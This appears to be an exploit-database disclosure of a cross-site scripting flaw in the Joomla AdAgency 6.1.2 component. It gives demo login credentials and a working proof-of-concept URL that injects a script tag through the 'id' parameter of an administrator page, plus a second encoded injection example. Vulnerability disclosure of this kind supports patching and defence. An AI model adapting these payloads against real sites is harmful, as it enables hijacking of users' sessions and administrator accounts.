Joomla Adagency 6.1.2 Cross Site Scripting ≈ Packet Storm
# Exploit Title: Joomla! Adagency V 6.1.2 Cross Site Scripting
# Date: 24.07.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://adagency.ijoomla.com/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest-vincent.blogspot.com/
# PoC:https://pentest-vincent.blogspot.com/2020/08/joomla-adagency-v-612-cross-site.html
# Date: 24.07.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://adagency.ijoomla.com/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest-vincent.blogspot.com/
# PoC:https://pentest-vincent.blogspot.com/2020/08/joomla-adagency-v-612-cross-site.html
PoC:
https://ijoomlademo.com
user demo
password demo
Example with xss code injection:
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E
Example with xss/html code injection :
https://youtube.com/watch?v=s5_XkjC2fGY%2522%2520frameborder%3D%25220%2522%2520allowfullscreen%253E%253C
Video PoC:
https://www.youtube.com/watch?v=APDqKv88znw
Picture:
XSS code on the pastebin:
https://pastebin.com/bRSnjZtL
Gloss